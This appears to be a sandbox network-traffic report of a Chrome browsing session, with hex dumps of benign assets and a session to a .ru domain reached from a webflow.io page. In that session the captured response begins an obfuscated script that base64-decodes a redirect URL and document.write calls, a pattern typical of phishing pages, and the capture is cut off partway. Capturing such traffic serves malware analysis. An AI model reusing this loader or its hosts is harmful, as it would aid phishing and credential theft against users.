                                                    Etag: "c82cec3b78a2b2d267bbfe3c7e838068"
                                                    X-Amz-Server-Side-Encryption: AES256
                                                    Cache-Control: max-age=84600, must-revalidate
                                                    Accept-Ranges: bytes
                                                    Server: AmazonS3
                                                    Via: 1.1 417a202d3041fbbec8f1a62f5241641e.cloudfront.net (CloudFront)
                                                    Age: 59108
                                                    Access-Control-Allow-Origin: *
                                                    X-Cache: Hit from cloudfront
                                                    X-Amz-Cf-Pop: JFK50-P10
                                                    X-Amz-Cf-Id: 0PB2Y6YjuaZyIMECaHGFp555xJ_HBjn_AE_7-2m2fiX_fOcpK7Tb5w==
                                                    2025-03-28 12:42:42 UTC9912INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 31 38 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 31 38 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 30 2e 35 32 35 30 32 34 20 30 2e 38 39 36 34 38 34 48 33 2e 30 35 34 33 32 4c 36 2e 30 30 37 37 36 20 38 2e 32 36 36 32 32 4c 38 2e 38 39 39 30 35 20 30 2e 38 39 36 34 38 34 48 31 31 2e 33 35 33 31 56 31 31 48 39 2e 34 37 33 32 37 56 33 2e 37 39 39 34 39 4c 36 2e 36 36 33 37 20 31 31 48 35 2e 31 38 37 31 33 4c 32 2e 33 38 34 34 20 33 2e 39 32 30 37 37 56 31 31 48 30 2e 35 32 35 30 32 34 56 30 2e 38 39 36 34 38 34 5a 22 20 66 69 6c 6c 3d
                                                    Data Ascii: <svg width="118" height="12" viewBox="0 0 118 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M0.525024 0.896484H3.05432L6.00776 8.26622L8.89905 0.896484H11.3531V11H9.47327V3.79949L6.6637 11H5.18713L2.3844 3.92077V11H0.525024V0.896484Z" fill=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.549741104.18.160.1174436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:42 UTC405OUTGET /img/favicon.ico HTTP/1.1
                                                    Host: cdn.prod.website-files.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Sec-Fetch-Storage-Access: active
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:42 UTC645INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:42:42 GMT
                                                    Content-Type: image/x-icon
                                                    Content-Length: 15086
                                                    Connection: close
                                                    x-amz-id-2: QRs3q+dhKhAMTlvzYZ9HsOXkYLhQn66tiVr3vbhVW/V2FbAxceQ9QjMXwPqcyzjtLgD1BjyzKEE=
                                                    x-amz-request-id: BSTN61CAHM9SMTMC
                                                    Last-Modified: Thu, 05 Oct 2023 23:38:20 GMT
                                                    ETag: "1f894f487d068a2ced95d5cd4f88598c"
                                                    x-amz-server-side-encryption: AES256
                                                    Cache-Control: max-age=84600, must-revalidate
                                                    x-amz-version-id: C5TuT6ObkzP1GjuEGkIHJatwDHqj5J6N
                                                    CF-Cache-Status: HIT
                                                    Age: 30871
                                                    Accept-Ranges: bytes
                                                    Access-Control-Allow-Origin: *
                                                    Server: cloudflare
                                                    CF-RAY: 9277358128834408-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2025-03-28 12:42:42 UTC724INData Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 32 2b 88 39 32 2b f3 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                    Data Ascii: 00 %6 % h6(0` $92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                    2025-03-28 12:42:42 UTC1369INData Raw: 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                    Data Ascii: +92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                    2025-03-28 12:42:42 UTC1369INData Raw: ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32
                                                    Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92
                                                    2025-03-28 12:42:42 UTC1369INData Raw: f8 f8 f8 ff f8 f8 f8 ff f8 f8 f8 ff f7 f7 f7 ff 8e 8a 86 ff 37 30 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 38 30 29 ff 50 49 43 ff e0 e0 df ff f8 f9 f9 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f9 f9 f9 ff f9 f9 f9 ff e2 e1 e0 ff 9a 96 93 ff 4b 44 3e ff 44 3d 36 ff c9 c7 c5 ff f9 fa fa ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f9 f9 f9 ff d6 d5 d4 ff 4f 49 42 ff 38 31 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b
                                                    Data Ascii: 70)92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+80)PICKD>D=6OIB81)92+92+92+92+92+92+92+92+92+
                                                    2025-03-28 12:42:42 UTC1369INData Raw: f9 f9 ff de dd dc ff 56 50 4a ff 37 30 29 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 38 31 2a ff 4b 45 3f ff c0 be bc ff d3 d2 d1 ff d2 d1 d0 ff d2 d1 d0 ff d1 cf ce ff d9 d8 d6 ff f5 f4 f4 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff 9c 99 96 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff
                                                    Data Ascii: VPJ70)92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+81*KE?92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                    2025-03-28 12:42:42 UTC1369INData Raw: 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 3c 36 2f ff 53 4d 47 ff 57 51 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 57 51 4b ff 50 4a 44 ff 3b 34 2d ff 38 31 2a ff 41 3a 33 ff 56 50 4a ff 56 51 4b ff 56 50 4b ff 57 51 4b ff 54 4e 48 ff 3f 38 31 ff 39 32 2a ff 3a 33 2d ff 50 4a 44 ff 57 51 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 56 50 4b ff 57 51 4b ff 4f 49 43 ff 3a 33 2c ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                    Data Ascii: +92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+<6/SMGWQKVPKVPKVPKWQKPJD;4-81*A:3VPJVQKVPKWQKTNH?8192*:3-PJDWQKVPKVPKVPKVPKWQKOIC:3,92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+9
                                                    2025-03-28 12:42:42 UTC1369INData Raw: ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32
                                                    Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92
                                                    2025-03-28 12:42:42 UTC1369INData Raw: 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b f3 39 32 2b 89 39 32 2b f4 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b
                                                    Data Ascii: 92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                    2025-03-28 12:42:42 UTC1369INData Raw: 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff
                                                    Data Ascii: 2+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+
                                                    2025-03-28 12:42:42 UTC1369INData Raw: 2b ff 39 32 2b ff 3c 35 2e ff 54 4e 48 ff 76 72 6d ff b2 b0 ad ff eb ea ea ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f3 f3 f3 ff f6 f6 f6 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff ef ef ef ff 72 6d 68 ff 36 2f 28 ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 3f 39 32 ff 68 63 5d ff 6e 69 64 ff 74 6f 6b ff b1 ae ab ff f5 f5 f5 ff f7 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f7 f7 f7 ff f7 f7 f7 ff fa fa fa ff c0 be bc ff 41 3b 34 ff 38 31 2a ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39 32 2b ff 39
                                                    Data Ascii: +92+<5.TNHvrmrmh6/(92+92+92+92+92+92+92+92+92+92+92+92+92+92+92+?92hc]nidtokA;481*92+92+92+92+92+92+92+92+92+92+92+92+9


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.549728142.251.40.1644436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:43 UTC567OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                                    Host: www.google.com
                                                    Connection: keep-alive
                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiJo8sBCIWgzQEI9s/OAQiB1s4BCNLgzgEIr+TOAQji5M4BCIvlzgE=
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: empty
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:43 UTC1303INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:42:43 GMT
                                                    Pragma: no-cache
                                                    Expires: -1
                                                    Cache-Control: no-cache, must-revalidate
                                                    Content-Type: text/javascript; charset=UTF-8
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-mwxjpnIwL4J1ypQO5P3O2w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                    Accept-CH: Downlink
                                                    Accept-CH: RTT
                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                    Accept-CH: Sec-CH-UA-Platform
                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                    Accept-CH: Sec-CH-UA-Arch
                                                    Accept-CH: Sec-CH-UA-Model
                                                    Accept-CH: Sec-CH-UA-Bitness
                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                    Accept-CH: Sec-CH-UA-WoW64
                                                    Permissions-Policy: unload=()
                                                    Content-Disposition: attachment; filename="f.txt"
                                                    Server: gws
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Accept-Ranges: none
                                                    Vary: Accept-Encoding
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    2025-03-28 12:42:43 UTC891INData Raw: 33 37 34 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 65 6e 6e 20 6d 65 64 69 63 69 6e 65 20 6a 6f 62 20 63 75 74 73 22 2c 22 77 6f 72 6c 64 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 73 20 66 69 67 75 72 65 20 73 6b 61 74 69 6e 67 22 2c 22 6e 65 74 66 6c 69 78 20 6d 69 6c 6c 69 6f 6e 20 64 6f 6c 6c 61 72 20 73 65 63 72 65 74 20 63 61 73 74 22 2c 22 77 65 61 74 68 65 72 20 61 64 76 69 73 6f 72 79 22 2c 22 62 6c 61 7a 65 20 73 74 61 72 20 65 78 70 6c 6f 73 69 6f 6e 22 2c 22 67 61 72 6d 69 6e 20 63 6f 6e 6e 65 63 74 20 70 6c 75 73 20 61 69 20 73 75 62 73 63 72 69 70 74 69 6f 6e 22 2c 22 75 62 69 73 6f 66 74 20 74 65 6e 63 65 6e 74 22 2c 22 70 61 75 6c 20 74 68 6f 6d 61 73 20 61 6e 64 65 72 73 6f 6e 20 6e 65 77 20 6d 6f 76 69 65 20 74 72 61 69 6c 65 72 22 5d 2c 5b
                                                    Data Ascii: 374)]}'["",["penn medicine job cuts","world championships figure skating","netflix million dollar secret cast","weather advisory","blaze star explosion","garmin connect plus ai subscription","ubisoft tencent","paul thomas anderson new movie trailer"],[
                                                    2025-03-28 12:42:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.549753172.67.166.1204436888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-28 12:42:55 UTC738OUTGET /zXMKsj/ HTTP/1.1
                                                    Host: fgof.koxicarev.ru
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                    sec-ch-ua-mobile: ?0
                                                    sec-ch-ua-platform: "Windows"
                                                    Upgrade-Insecure-Requests: 1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: navigate
                                                    Sec-Fetch-User: ?1
                                                    Sec-Fetch-Dest: document
                                                    Referer: https://littlestownseniorhighschool.webflow.io/
                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-03-28 12:42:55 UTC1171INHTTP/1.1 200 OK
                                                    Date: Fri, 28 Mar 2025 12:42:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: no-cache, private
                                                    Vary: accept-encoding
                                                    cf-cache-status: DYNAMIC
                                                    alt-svc: h3=":443"; ma=86400
                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6InRYVkFRN3NVU1VDQ3kzcmYwYVhjcUE9PSIsInZhbHVlIjoiOHB2QVdzZ2NDMVZOZ1NLTTlpUWNFcVlLVXE4dDJjWS8xQ0V1R29SYVFmNjNUK0YremFLRG1RNUZqT2ZqWTlORFBPcXFtYUh5TFN6L1VqQXcwaDNNUTBqWnJuaFlHRThaUFNuU1VxaHpvUWZnR2NWa2hkWGxFQnlDdGFGM0tzVnQiLCJtYWMiOiI5Yjc1ZjM5MThiNzczYTUwMzMxZjdhMzcyYTBmYWYyNGI2Nzc1ZWU3NmU2ZTU5N2IwZDliYWI4NTY4NTI5NmZiIiwidGFnIjoiIn0%3D; SameSite=None; Secure; Path=/; Max-Age=7200; Expires=Fri, 28 Mar 2025 14:42:55 GMT
                                                    Set-Cookie: laravel_session=eyJpdiI6IlNrSkhYU0dVTGhxNU55bWpjL0wySUE9PSIsInZhbHVlIjoiR1VvSityR0Z3T1NXazE5TUkzY0dUVTc3UklPQkFmd2piTmJoeWpXNHJVMEdSVHlRUldwOGZ5RU5tLzB2R1NZL2Fzd1F1NnFpdFViQnZXTmp2UG1nNHE2WXVJYkJRUEI0b0hzTEhYY1JVai9ySXZXdkQ0ZlNQL0hsNytuQkJYMzciLCJtYWMiOiIyYWE5YzIxMmEyMGExMmE0OGMwNTFkYjMxY2RhYmYxYzYzOTRhNjgzOTgyOWE5NzM3NmY3ZDU5MTU4MzU2NzIxIiwidGFnIjoiIn0%3D; HttpOnly; SameSite=None; Secure; Path=/; Max-Age=7200; Expires=Fri, 28 Mar 2025 14:42:55 GMT
                                                    2025-03-28 12:42:55 UTC605INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 78 45 30 37 59 4c 5a 34 41 52 39 41 68 7a 41 35 6d 45 7a 42 47 74 4f 51 6f 71 56 68 4c 31 53 75 74 4c 6e 39 36 4c 73 53 41 6d 67 55 34 35 55 48 74 4f 75 63 71 36 30 35 69 51 4f 53 34 63 43 58 67 38 56 68 31 58 6b 46 50 6e 25 32 46 77 55 4c 64 6a 50 25 32 42 25 32 46 79 6a 67 56 44 56 77 4e 5a 32 25 32 46 43 79 50 54 38 31 70 79 37 4f 55 61 57 67 70 76 64 62 35 61 53 75 25 32 42 58 50 61 50 53 73 6b 53 25 32 46 50 78 62 4d 6e 4f 67 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xE07YLZ4AR9AhzA5mEzBGtOQoqVhL1SutLn96LsSAmgU45UHtOucq605iQOS4cCXg8Vh1XkFPn%2FwULdjP%2B%2FyjgVDVwNZ2%2FCyPT81py7OUaWgpvdb5aSu%2BXPaPSskS%2FPxbMnOgA%3D%3D"}],"group":"cf-nel","max
                                                    2025-03-28 12:42:55 UTC1369INData Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 3e 0a 56 74 56 48 58 54 61 75 6d 62 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 78 55 6b 63 75 61 32 39 34 61 57 4e 68 63 6d 56 32 4c 6e 4a 31 4c 33 70 59 54 55 74 7a 61 69 38 3d 22 29 3b 0a 76 73 5a 73 52 6e 51 51 6d 74 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 68 45 41 68 74 66 55 56 68 7a 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 56 74 56 48 58 54 61 75 6d 62 20 3d 3d 20 76 73 5a 73 52 6e 51 51 6d 74 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 68 45 41 68 74 66 55 56 68 7a 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f
                                                    Data Ascii: 7ffa<script>VtVHXTaumb = atob("aHR0cHM6Ly8xUkcua294aWNhcmV2LnJ1L3pYTUtzai8=");vsZsRnQQmt = atob("bm9tYXRjaA==");hEAhtfUVhz = atob("d3JpdGU=");if(VtVHXTaumb == vsZsRnQQmt){document[hEAhtfUVhz](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+Cjxo
